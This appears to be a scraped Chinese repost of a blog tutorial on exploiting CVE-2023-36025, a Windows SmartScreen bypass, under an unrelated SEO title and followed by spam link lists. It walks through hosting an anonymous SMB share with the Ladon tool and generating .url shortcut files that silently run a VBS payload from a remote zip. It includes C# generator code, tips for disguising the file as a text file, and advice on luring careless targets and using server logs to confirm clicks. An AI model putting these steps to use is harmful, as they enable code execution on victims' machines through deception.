当前位置: 首页 > news >正文

网站建站流程有哪些苏州苏州设计公司

网站建站流程有哪些,苏州苏州设计公司,掌上大学微信管理系统,360建筑网简历怎么删除漏洞简介 CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞#xff0c;对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏…漏洞简介 CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低可创建并诱导用户点击恶意设计的 Internet 快捷方式文件 (.URL) 或指向此类文件的超链接来利用该漏洞无需特殊权限即可通过互联网进行利用。 影响范围 Win7Win10Win11Win2008Win2012Win2016Win2019Win2022 从影响版本上看确实牛B但从触发或文件格式上看可能不占优势。 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36025 漏洞复现 条件 1.目标能访问到SMB共享VPS外网或内网架设都可以2.需用户点击POC文件(自己想办法) 一、开启SMB服务器 关闭系统SMB服务不让445端口占用,使用CloseSMB模块重启生效当然也可以不关闭直接使用系统的开启SMB共享因为这洞和Win11主题RCE不一样不需要特制SMB共享。 关闭SMB Ladon CloseSMB PS: 彻底关闭445端口SMB相关服务重启生效可防止SMB漏洞或新出0day攻击在VPS上使用一键程序会比开启系统SMB要安全很多除非别人挖Ladon的SMB服务器漏洞,且用完就关很安全。 一键开启SMB匿名共享 Ladon SmbServer 资源管理器访问\\192.168.50.165\test看到共享即为成功 网安学习/漏洞挖掘/攻防实战 二、 程序同根目录下放share目录 share目录里放一个test.zip文件test.zip压缩test.vbs文件test.vbs内容为自己的内容样例为弹框。通过共享访问应该看到share里面的内容共享名称为test 直接双击vbs、exe、bat等有“安全警告” 点打开后才执行打开zip文件也会有提示(在win7下其它系统zip好像直接目录浏览) 三、生成url文件poc 支持IP、URL、UNC以及file完整路径格式填写IP默认POC请求指向test目录下test.zip/test.vbs文件 Ladon GenURL 192.168.188.2 Ladon GenURL http://192.168.188.2 Ladon GenURL \\192.168.50.189\testLadon GenURL \\192.168.188.2\Ladon GenURL \\192.168.188.2\ Ladon GenURL file://192.168.188.2/test/test.zip/test.vbsLadon GenURL file://192.168.188.2/testLadon GenURL file://192.168.188.2/ 正常的URL文件可能是系统自带的url快捷方式图标如果IE或Firefox等浏览器关联那么就显示成对应浏览器的图标。 Ladon生成的URL图标如下具有一定迷惑性双击test.txt无任何提示直接执行VBS脚本。  测试win11也是一样直接执行 通过Ladon控制台可以看到Win7和Win11都访问了我们的SMB查看SmbServer.log日志可看到访问了test.zip文件若是实战可用于确认目标是否点击如果是其它漏洞我们也可以确认目标是否触发如域打印机提权DLL也需要SMB共享上次win11的RCE也是一样。 URL文件生成代码 using System;using System.IO; class Program{ static void Main(string[] args) { if (args.Length 1) { Console.WriteLine(ip); return; }string ip args[0]; string url file:// ip /test/test.zip/test.vbs; string content [InternetShortcut]\nURL url \nIDList\n;File.WriteAllText(test.url, content); }} 触发方式 1.直接打开或双击poc文件会触发 2.zip、rar、7z等压缩包里双击poc也会触发 3.解压后打开或双击poc文件会触发(就是1) 解压后使用Ladon生成的文件不是互联网图标。 使用Ladon生成的URL文件解压出来看上去像TXT不注意的人就会点 PS尝试伪装成任意图标不管是全路径还是URL均失败小结 漏洞补丁已发布3个月即使杀软或EDR不拦截也不一定能触发发的是URL文件不是DOC、PDF、Excel这种正常文档文件别人点击的概率低。当然如果你的文案好或组合其它漏洞链接到url文件再加上一点运气可能不会空军。有些附件只允许ZIP、RAR文档想诱导人点URL文件可能更难但这个绕过技巧还是值得学习或许组合其它漏洞可以发挥更大作用。 系统漏洞和office漏洞不一样出补丁系统更新或杀软也会补上但是office用户不打补丁杀软也不是针对漏洞点拦截旧洞只要做好免杀就能用所以不能一概而论此漏洞对有点安全意识的人可能没用因为至少它们知道不熟悉的后缀不要点但对于没有安全意识的看图标无害杀软也不杀他们就点了所以成功率高不高取决于目标如果确定目标意识差可以尝试。
http://www.zqtcl.cn/news/56583/

相关文章:

  • 网站设置cookie什么意思凡科网站手机投票怎么做
  • 如何做服装的微商城网站建设广州有几个区哪个区最好
  • 做学校网站素材图片大全泰兴网站设计
  • 网站中如何做图片轮播网站开发常用的框架
  • 做优化网站能以量取胜么wordpress 悬浮插件
  • 儿童摄影网站怎么做济南哪个公司做网站好
  • 网站建设与管理实训心得宣传片拍摄应急预案
  • 建设网站破解版网站 备案网站
  • 黄山网站设计wordpress获取路径
  • 河北做网站公司那家好做网站常用字体
  • 建设电商网站流程网站建设备案审核要多久
  • 网站建设有前途吗黄梅那里有做网站的
  • 山东聊城做网站wordpress在线阅读主题
  • 工信部 网站备案查询怎么做娱乐电玩网站
  • 网站建设 金手指排名霸屏简洁大气网站模板
  • 二级网站收录福州网上办事大厅
  • 微信小程序怎么做购物网站百度登录页面
  • 网站 不稳定专门做生鲜的网站
  • 翻译公司网站建设多少钱网站的建设目标
  • 域名推荐网站织梦映像
  • 商学院网站建设建议网站主页设计教程
  • 网站设计培训成都哪家好中国企业500强最新排名
  • 中国住房和城乡建设部网站证书查询简历在线制作免费
  • 网站建设都包括哪些方面wap 2.0的网站
  • 成华区微信网站建设西安网站建设制作公司
  • 文成网站今天国际大事新闻
  • 培训培训网站建设昆明广告网站制作
  • 无锡做网站6自己做一网站
  • 建设学校网站前的需求分析动漫设计与制作主要学什么
  • 如何比较网站wordpress 标签页面